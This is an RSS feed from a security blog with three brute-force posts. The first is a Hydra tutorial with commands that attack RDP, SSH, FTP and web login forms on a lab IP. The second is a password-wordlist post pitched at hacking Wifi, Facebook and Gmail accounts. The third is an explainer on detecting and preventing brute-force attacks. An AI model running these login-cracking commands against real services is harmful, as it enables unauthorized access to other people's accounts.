<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>Brute &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/brute/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Fri, 17 Nov 2023 00:47:24 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.2</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>Brute &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How to use Hydra to attack Brute Force</title>
		<link>https://en.anonyviet.com/how-to-use-hydra-to-attack-brute-force/</link>
					<comments>https://en.anonyviet.com/how-to-use-hydra-to-attack-brute-force/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 17 Nov 2023 00:47:24 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[Brute]]></category>
		<category><![CDATA[Force]]></category>
		<category><![CDATA[Hydra]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=13770</guid>

					<description><![CDATA[In this article, we will talk about brute force tools Hydra. According to Wikipedia, Hydra is a parallel network login cracker. It is available on several Linux Penetration Testing distributions such as Kali Linux, Parrot OS, Black Arch and BackBox. Hydra is capable of performing attacks against various network services such as Remote Desktop, Secure [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>In this article, we will talk about brute force tools <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fvanhauser-thc%2Fthc-hydra" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Hydra</a>.  According to Wikipedia, Hydra is a parallel network login cracker.  It is available on several Linux Penetration Testing distributions such as Kali Linux, Parrot OS, Black Arch and BackBox.  Hydra is capable of performing attacks against various network services such as Remote Desktop, Secure Shell and many others.  It is also capable of performing brute force attacks against web applications.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="13770" fifu-featured="1" loading="lazy" decoding="async" class="aligncenter wp-image-42712 size-full" src="https://anonyviet.com/wp-content/uploads/2022/07/hydrimage.jpg" alt="How to use Hydra to attack Brute Force" title="How to use Hydra to attack Brute Force" width="608" height="435" title="How to use Hydra to attack Brute Force 12" srcset="https://anonyviet.com/wp-content/uploads/2022/07/hydrimage.jpg 608w, https://anonyviet.com/wp-content/uploads/2022/07/hydrimage-300x215.jpg 300w, https://anonyviet.com/wp-content/uploads/2022/07/hydrimage-120x86.jpg 120w, https://anonyviet.com/wp-content/uploads/2022/07/hydrimage-350x250.jpg 350w" sizes="auto, (max-width: 608px) 100vw, 608px"/></p>
<h2 id="ftoc-cach-cai-dat-hydra" class="ftwp-heading">How to install Hydra</h2>
<p>Hydra tends to be pre-installed on most pentest distributions.  However, it can also be installed using apt.  If your repository does not have Hydra then it can be easily installed from GitHub using the git clone command.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-42713 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/0_qqwIFMU6PSu0fYhV.jpg" alt="How to use Hydra to attack Brute Force 8" width="510" height="146" title="How to use Hydra to attack Brute Force 13" srcset="https://anonyviet.com/wp-content/uploads/2022/07/0_qqwIFMU6PSu0fYhV.jpg 510w, https://anonyviet.com/wp-content/uploads/2022/07/0_qqwIFMU6PSu0fYhV-300x86.jpg 300w" sizes="auto, (max-width: 510px) 100vw, 510px"/></p>
<h2 id="0490" class="ls lt jj bn lu lv lw lx ly lz ma mb mc md me mf mg mh mi mj mk ml mm mn mo mp hk ftwp-heading">Brute Forcing RDP</h2>
<p>Remote Desktop Protocol or RDP (Remote Desktop Protocol) is a remote management tool mainly used in Windows environments.  It uses terminal services to allow users to connect to the target server using RDP Client.  Then, users will see what is displayed on other people&#8217;s computers.  Furthermore, this will enable them to perform management tasks.  RDP is often attacked by hackers using automated tools like Hydra.  You can see the image below to see the RDP attack command.  The L flag specifies a list of users, the P flag specifies a list of passwords.  Lower case variants will allow you to specify individual words.  The -F flag tells Hydra to stop once it has found the correct password.  Then we need to specify the protocol, IP address.</p>
<p><code>sudo hydra -L usernames.txt -P passwords.txt -F rdp://10.0.2.5 -V</code></p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-42715 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/0_xhq1H1codG1C7qMF.jpg" alt="How to use Hydra to attack Brute Force 9" width="510" height="210" title="How to use Hydra to attack Brute Force 14" srcset="https://anonyviet.com/wp-content/uploads/2022/07/0_xhq1H1codG1C7qMF.jpg 510w, https://anonyviet.com/wp-content/uploads/2022/07/0_xhq1H1codG1C7qMF-300x124.jpg 300w" sizes="auto, (max-width: 510px) 100vw, 510px"/></p>
<h2 id="4ada" class="ls lt jj bn lu lv lw lx ly lz ma mb mc md me mf mg mh mi mj mk ml mm mn mo mp hk ftwp-heading">Brute Forcing SSH</h2>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fssh-la-gi-va-no-dai-dien-cho-dieu-gi%2F%23%3A%7E%3Atext%3DSecure%2520Shell%2520%28SSH%29%2520l%25C3%25A0%2520m%25E1%25BB%2599t%2Cc%25E1%25BA%25A3%2520c%25C3%25A1c%2520h%25E1%25BB%2587%2520%25C4%2591i%25E1%25BB%2581u%2520h%25C3%25A0nh." class="local-link" rel="noopener">SSH</a> or Secure Shell is another remote management protocol.  It is found in Linux or Unix environments but has recently been added to Windows.  Furthermore, it is considered the successor of telnet.  Telnet is not encrypted so everything is transmitted in plain text.  If a threat actor on your network performs a man-in-the-middle attack, the hacker will be able to see your username and password transmitted to the telnet server.  SSH is an encrypted protocol, so if traffic is intercepted, it won&#8217;t be readable by hackers.  You can perform SSH brute force attacks as follows:</p>
<p><code>sudo hydra -L username.txt -P passwords.txt -F ssh://10.0.2.5 -V</code></p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-42716 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/0_GEldJoYjh61o9WSP-1.jpg" alt="How to use Hydra to attack Brute Force 10" width="510" height="239" title="How to use Hydra to attack Brute Force 15" srcset="https://anonyviet.com/wp-content/uploads/2022/07/0_GEldJoYjh61o9WSP-1.jpg 510w, https://anonyviet.com/wp-content/uploads/2022/07/0_GEldJoYjh61o9WSP-1-300x141.jpg 300w" sizes="auto, (max-width: 510px) 100vw, 510px"/></p>
<h2 id="1794" class="ls lt jj bn lu lv lw lx ly lz ma mb mc md me mf mg mh mi mj mk ml mm mn mo mp hk ftwp-heading">Brute Forcing FTP</h2>
<p>FTP is a protocol for transferring files and is also subject to brute force attacks by Hydra.  The syntax will be identical to RDP and SSH.  Just replace the FTP protocol.  There are many more Hydra options and you can tweak your attacks to be more specific.  To perform an FTP brute force attack:</p>
<p><code>Sudo hydra -L username.txt -P passwords.txt -F ftp://10.0.2.5 -V</code></p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-42717 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/0_fXbnwVMQL4M8P5cm.jpg" alt="How to use Hydra to attack Brute Force 11" width="510" height="209" title="How to use Hydra to attack Brute Force 16" srcset="https://anonyviet.com/wp-content/uploads/2022/07/0_fXbnwVMQL4M8P5cm.jpg 510w, https://anonyviet.com/wp-content/uploads/2022/07/0_fXbnwVMQL4M8P5cm-300x123.jpg 300w" sizes="auto, (max-width: 510px) 100vw, 510px"/></p>
<h2 id="3e4e" class="ls lt jj bn lu lv lw lx ly lz ma mb mc md me mf mg mh mi mj mk ml mm mn mo mp hk ftwp-heading">Brute Forcing web applications</h2>
<p>You can also brute force web applications.  However, the syntax to do so is a bit more complicated.  You&#8217;ll start by specifying a list of usernames and passwords.  However, now you need to specify the type of web attack whether it is “http-post-form” or “http-get-form” or whether it is using basic authentication.  Then you need to specify the path to the file to attack.  Next, you need to define the parameters for the attack (username and password).  Furthermore, you need to assign placeholders to users and pass variables.  Finally, you need to specify any cookies.  You can see the example below:</p>
<p><code>hydra -L users.txt -P password.txt 10.0.2.5 http-post-form "/path/index.php:name=^USER^&amp;password=^PASS^&amp;enter=Sign+in:Login name or password is incorrect" -V</code></p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-42718 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/0_v2_0vFTmo1i4juoU.jpg" alt="How to use Hydra to attack Brute Force 12" width="510" height="291" title="How to use Hydra to attack Brute Force 17" srcset="https://anonyviet.com/wp-content/uploads/2022/07/0_v2_0vFTmo1i4juoU.jpg 510w, https://anonyviet.com/wp-content/uploads/2022/07/0_v2_0vFTmo1i4juoU-300x171.jpg 300w" sizes="auto, (max-width: 510px) 100vw, 510px"/></p>
<h2 id="ftoc-giao-dien-nguoi-dung-do-hoa-hydra" class="ftwp-heading">Hydra graphical user interface</h2>
<p>Hydra also has a graphical user interface.  To launch it, you need to run the xhydra command.  If you prefer GUIs then this may be your preferred method of using hydra.  Personally, I prefer using the command line, I actually find it easier to configure than the GUI.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-42719 aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/07/0_2-R49Ay9x0YHdlrd.jpg" alt="How to use Hydra to attack Brute Force 13" width="392" height="462" title="How to use Hydra to attack Brute Force 18" srcset="https://anonyviet.com/wp-content/uploads/2022/07/0_2-R49Ay9x0YHdlrd.jpg 392w, https://anonyviet.com/wp-content/uploads/2022/07/0_2-R49Ay9x0YHdlrd-255x300.jpg 255w" sizes="auto, (max-width: 392px) 100vw, 392px"/></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;42705&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;0&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;0&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 0\/5 - (0 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;title&quot;:&quot;C\u00e1ch d\u00f9ng Hydra \u0111\u1ec3 t\u1ea5n c\u00f4ng Brute Force&quot;,&quot;width&quot;:&quot;0&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>
            <span class="kksr-muted">Rate this post</span>
    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-use-hydra-to-attack-brute-force/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2022/07/hydrimage.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Summary of Worldlist 2022 (Password list) used to Brute Force</title>
		<link>https://en.anonyviet.com/summary-of-worldlist-2022-password-list-used-to-brute-force/</link>
					<comments>https://en.anonyviet.com/summary-of-worldlist-2022-password-list-used-to-brute-force/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 01 Feb 2023 03:21:23 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Brute]]></category>
		<category><![CDATA[Force]]></category>
		<category><![CDATA[List]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[Summary]]></category>
		<category><![CDATA[Worldlist]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7708</guid>

					<description><![CDATA[Here are some password dictionaries that can be used with Backtrack or Kali Linux. The list below is a collection of the most commonly used passwords if you can&#8217;t hack Wifi or any other account using Brute Force. Join the channel Telegram of the AnonyViet 👉 Link 👈 You can review how to Brute Force [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>Here are some password dictionaries that can be used with Backtrack or Kali Linux.  The list below is a collection of the most commonly used passwords if you can&#8217;t hack Wifi or any other account using Brute Force.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>You can review how to Brute Force password Facebook at <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fbruter-facebook-password-cracking-tool%2F" rel="noopener noreferrer" class="local-link">>>this post<<</a></p>
<p>BIG-WPA-LIST needs to be decompressed before use.</p>
<p><img fetchpriority="high" decoding="async" class="size-full wp-image-3333 aligncenter" src="https://anonyviet.com/wp-content/uploads/2016/12/WPA-WPA2-Word-List-Dictionaries-Downloads.jpg" width="500" height="250" srcset="https://anonyviet.com/wp-content/uploads/2016/12/WPA-WPA2-Word-List-Dictionaries-Downloads.jpg 500w, https://anonyviet.com/wp-content/uploads/2016/12/WPA-WPA2-Word-List-Dictionaries-Downloads-300x150.jpg 300w, https://anonyviet.com/wp-content/uploads/2016/12/WPA-WPA2-Word-List-Dictionaries-Downloads-360x180.jpg 360w" sizes="(max-width: 500px) 100vw, 500px" alt="Summary of Worldlist 2022 (Password list) used for Brute Force 4" title="Summary of Worldlist 2022 (Password list) used for Brute Force 6"/></p>
<p style="text-align: center;">This list of passwords can be used to Brute Force passwords (Wifi, Facebook, Gmail, etc.)</p>
<p style="text-align: left;"><span style="font-size: x-large;"><strong>WPA/WPA 2 Dictionaries Downloads</strong></span></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;609&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;101&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (101 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (101 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/summary-of-worldlist-2022-password-list-used-to-brute-force/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2015/12/brute_force-1024x599.png" medium="image"></media:content>
            	</item>
		<item>
		<title>What is a Brute Force Attack and How to Prevent it</title>
		<link>https://en.anonyviet.com/what-is-a-brute-force-attack-and-how-to-prevent-it/</link>
					<comments>https://en.anonyviet.com/what-is-a-brute-force-attack-and-how-to-prevent-it/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 27 Jan 2023 02:46:18 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[Brute]]></category>
		<category><![CDATA[Force]]></category>
		<category><![CDATA[prevent]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=4538</guid>

					<description><![CDATA[The term Brute Force has been mentioned a lot recently after Hieu PC attacked a fake website with a Brute Force Attack form, to log into cPanel – the tool that hosts and manages that fake website. Today we will learn what Brute Force Attack is and How to prevent it. Join the channel Telegram [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>The term Brute Force has been mentioned a lot recently after Hieu PC attacked a fake website with a Brute Force Attack form, to log into cPanel – the tool that hosts and manages that fake website.  Today we will learn what Brute Force Attack is and How to prevent it.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>Unlike many other tactics used by Hackers, attacks <strong>Brute Force</strong> do not rely on the site&#8217;s security holes.  Instead, these attacks rely on users having weak or predictable credentials.  Simple attacks and defined targets make attacks <strong>Brute Force</strong> very popular.</p>
<h2 id="ftoc-tan-cong-brute-force-la-gi" class="ftwp-heading">What is Brute Force Attack?</h2>
<p>Brute Force attack occurs when a hacker tries to try each password to see if it can log in.  These attacks typically involve multiple attempts at the account password in the hopes that one of them will be valid.  It&#8217;s a bit like you&#8217;re having a bunch of keys and trying to lock them one by one, but on a much larger scale.</p>
<p>Passwords aren&#8217;t the only resources that can be vulnerable to this type of attack: Links and directories, usernames, and emails are other common targets.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2020%2F12%2Fbrute_force_la-gi.png" rel="noopener" class="local-link"><img post-id="4538" fifu-featured="1" decoding="async" class="aligncenter wp-image-24134 size-full" src="https://anonyviet.com/wp-content/uploads/2020/12/brute_force_la-gi.png" alt="What is a Brute Force Attack and How to Prevent it" title="What is a Brute Force Attack and How to Prevent it" width="531" height="398" srcset="https://anonyviet.com/wp-content/uploads/2020/12/brute_force_la-gi.png 531w, https://anonyviet.com/wp-content/uploads/2020/12/brute_force_la-gi-300x225.png 300w" sizes="(max-width: 531px) 100vw, 531px" title="What is Brute Force Attack and How to Prevent 9"/></a></p>
<h2 id="ftoc-muc-dich-tan-cong-brute-force-la-gi" class="ftwp-heading">What is the purpose of Brute Force attack?</h2>
<p>The goal of a Brute Force attack is to gain access to a restricted resource for other users.  This could be for an admin account, a password protected site, or simply for listing valid emails on a certain website.</p>
<p>Having access to a valid account can mean that you are the owner of that Website, free to change, edit or even delete the Website.</p>
<h2 id="ftoc-tan-cong-brute-force-hoat-dong-nhu-the-nao" class="ftwp-heading"><strong>How does Brute Force attack work?</strong></h2>
<p>The most common type of brute force attack is <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fshare-worldlist-password-list-dung-de-brute-force%2F" rel="noopener" class="local-link">dictionary attack</a> using a common username and password to try to gain access to the admin account.</p>
<p>Typically, generic dictionary attacks will try to log in with the most commonly used credentials, such as “admin” and “123456”.</p>
<h2 id="ftoc-lam-sao-de-biet-ban-dang-bi-brute-force" class="ftwp-heading"><strong>How do you know if you are suffering from Brute Force?</strong></h2>
<p>Basically, if someone is trying to log into an account repeatedly and fails, it could be a Brute Force attack.</p>
<p>Signs may include:</p>
<ul>
<li>Same IP address fails when trying to login multiple times.</li>
<li>Many different IP addresses trying to login to one account failed.</li>
<li>Multiple failed login attempts from different IP addresses within a short period of time.</li>
</ul>
<h3 id="ftoc-vi-du-ve-tan-cong-brute-force" class="ftwp-heading"><strong>Brute Force Attack Example</strong></h3>
<p>Possible brute force attacks <strong>add you to the botnet to expose you to DDoS attacks</strong>.  Hack attack Brute Force after having login information to change the Website interface.</p>
<p>Gaining access to an admin account on a website is like exploiting a critical vulnerability.  Hackers will <strong>try to profit from access</strong>such as by adding spam, spreading malware, or phishing to keep victims unsuspecting.</p>
<h2 id="ftoc-cac-kieu-tan-cong-brute-force" class="ftwp-heading"><strong>Brute Force Attack Types</strong></h2>
<p>Basically, Brute Force is an act of trying many combinations, but there are many variations of this type of attack to increase the success rate.  These are the most common:</p>
<h3 id="ftoc-tan-cong-brute-force-don-gian" class="ftwp-heading"><strong>Simple Brute Force Attack</strong></h3>
<p>A generic Brute Force attack can use different methods, such as repeating all possible passwords at once.  This is often used on weakly secure websites where there is no limit on the number of incorrect entries.</p>
<h3 id="ftoc-tan-cong-tu-dien" class="ftwp-heading"><strong>Dictionary Attack</strong></h3>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2020%2F12%2Fbrute-force-la-gi.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-24133 size-full" src="https://anonyviet.com/wp-content/uploads/2020/12/brute-force-la-gi.jpg" alt="Dictionary attack brute force attack" width="689" height="224" srcset="https://anonyviet.com/wp-content/uploads/2020/12/brute-force-la-gi.jpg 689w, https://anonyviet.com/wp-content/uploads/2020/12/brute-force-la-gi-300x98.jpg 300w" sizes="auto, (max-width: 689px) 100vw, 689px" title="What is Brute Force Attack and How to Prevent 10"/></a></p>
<p>This attack uses a list of common passwords instead of random access, builds a &#8220;dictionary&#8221; of possible passwords, and repeats them.  Using a good password list can help improve the hacker&#8217;s success rate, but these attacks require time, and the number of passwords in the dictionary you have.</p>
<p>If you have ever Hacked Wifi WPA2, you must have used a dictionary to detect Passwifi.</p>
<h3 id="ftoc-lai-brute-force-attack" class="ftwp-heading"><strong>Hybrid Brute Force Attack</strong></h3>
<p>A hybrid attack uses both a dictionary attack and a regular repetition attack.  Instead of trying literally all passwords, it will<strong> make modifications</strong> small for dictionary words, such as adding numbers or changing letters.</p>
<h3 id="ftoc-nhoi-thong-tin-xac-thuc" class="ftwp-heading"><strong>Credential stuffing</strong></h3>
<p>With the increasing amount of user/password data exposed by weakly secure websites, using multiple accounts using the same password makes it easier for accounts to be hacked.</p>
<p>Once the Hacker has a hacked database of Website A, they can easily use the collected login information to access Website B, if the users share the same user/password.</p>
<p>Therefore, regularly changing the password, and not sharing the same password for the account is a regular thing to do.</p>
<h2 id="ftoc-lam-the-nao-de-ngan-chan-cuoc-tan-cong-brute-force" class="ftwp-heading"><strong>How to prevent Brute Force attack</strong></h2>
<p>Since Brute Force attacks are not a security hole, updating the software is not enough to protect yourself.  Here are some common methods to prevent these attacks:</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2020%2F12%2Fcach-phong-tranh-brute-force.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-24135 size-full" src="https://anonyviet.com/wp-content/uploads/2020/12/cach-phong-tranh-brute-force.jpg" alt="How to prevent Brute Force attack" width="555" height="369" srcset="https://anonyviet.com/wp-content/uploads/2020/12/cach-phong-tranh-brute-force.jpg 555w, https://anonyviet.com/wp-content/uploads/2020/12/cach-phong-tranh-brute-force-300x199.jpg 300w" sizes="auto, (max-width: 555px) 100vw, 555px" title="What is Brute Force Attack and How to Prevent 11"/></a></p>
<h3 id="ftoc-su-dung-mat-khau-manh" class="ftwp-heading"><strong>Use strong passwords</strong></h3>
<p>Brute force relies on weak passwords.  Strong passwords have the following characteristics:</p>
<p><strong>Only</strong> : You should avoid reusing passwords, as websites are compromised and passwords will be exposed.  By reusing passwords, Hackers can more easily target you with your compromised credentials on other websites.</p>
<p><strong>Long</strong> : Longer password means more combinations.  A five-character password is easy to crack on any computer in seconds, 10 characters will take years, and 50 characters will take almost forever.</p>
<p><strong>Hard to guess</strong>: Pieces of information like your own name or the city where you live can make passwords easier to remember, but also easier to guess if someone gets any information about you.  The same goes for regular text, such as “12345” or “password,” which is commonly used in logins, because they are easy to remember.</p>
<p>With these characteristics in place, Brute Force attempts will fail to guess your password.</p>
<p>The same principles apply to recovery questions: If your recovery questions are weak but your password is strong, it&#8217;s much easier for an attacker to reset your password instead of guessing it.</p>
<h3 id="ftoc-khong-de-lo-link-dang-nhap" class="ftwp-heading"><strong>Do not reveal the login link</strong></h3>
<p>The requirement for brute force attacks is to submit credentials.  If you change the login page address – for example, switch from <strong>/login.php</strong> luxurious <strong>/anonyviet-login</strong> this may be enough to prevent most automated tools and batches from sniffing passwords.</p>
<p>However, advanced attacks or public forum pages require a URL for members to log in</p>
<h3 id="ftoc-gioi-han-so-lan-dang-nhap-sai" class="ftwp-heading"><strong>Limit the number of wrong login attempts</strong></h3>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2020%2F12%2Fcaptcha-1.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-24136 size-full" src="https://anonyviet.com/wp-content/uploads/2020/12/captcha-1.jpg" alt="Limit the number of false logins with captcha" width="434" height="278" srcset="https://anonyviet.com/wp-content/uploads/2020/12/captcha-1.jpg 434w, https://anonyviet.com/wp-content/uploads/2020/12/captcha-1-300x192.jpg 300w" sizes="auto, (max-width: 434px) 100vw, 434px" title="What is Brute Force Attack and How to Prevent 12"/></a></p>
<p>Brute Force attacks are based on trying multiple passwords and accounts.  By limiting the number of logins per user, Hackers won&#8217;t be able to try multiple passwords</p>
<p>A common way to limit login attempts is to temporarily ban an IP from logging in after five unsuccessful login attempts. If entered incorrectly, the IP will be blocked.</p>
<p>However, there are now some bypass tools by manually changing the IP with a proxy or VPN, helping Hackers to Brute Force continuously.</p>
<h3 id="ftoc-su-dung-captcha" class="ftwp-heading"><strong>Use CAPTCHA</strong></h3>
<p>Captcha is a good way to prevent bots and automated tools from performing Brute Force attacks on your website by giving login challenges.  Since challenges are designed to be solved by humans, tools and software will have a hard time overcoming them to prevent their attacks.</p>
<p>Now Hacker also released auto bypass captcha tools, including Google Captcha.</p>
<h3 id="ftoc-su-dung-xac-thuc-hai-yeu-to-2fa" class="ftwp-heading"><strong>Use two-factor authentication (2FA)</strong></h3>
<p>2FA creates another layer of security after logging in with a user/password, such as confirmation via email or OTP SMS.</p>
<p>This extra layer prevents anyone from successfully obtaining your credentials.</p>
<h2 id="ftoc-chot-lai-cac-cuoc-tan-cong-brute-force" class="ftwp-heading"><strong>Pause Brute Force Attacks</strong></h2>
<p>It&#8217;s amazing to know that one of the most popular and successful methods is man-made.  Avoiding Brute Force attacks can simply be a matter of changing your security habits, such as using stronger passwords and not reusing them, or changing the login page to an easy-to-guess URL.</p>
<p>You can also put a little extra effort into security by setting up two-factor authentication or setting your site up later. <strong>web application firewall (WAF)</strong> .  Basically, a firewall will prevent hackers from trying to break into your account.</p>
<p><strong>If you want to learn the tools and how to use the tools used to Brute Force, comment below I will write a more detailed article.</strong></p>
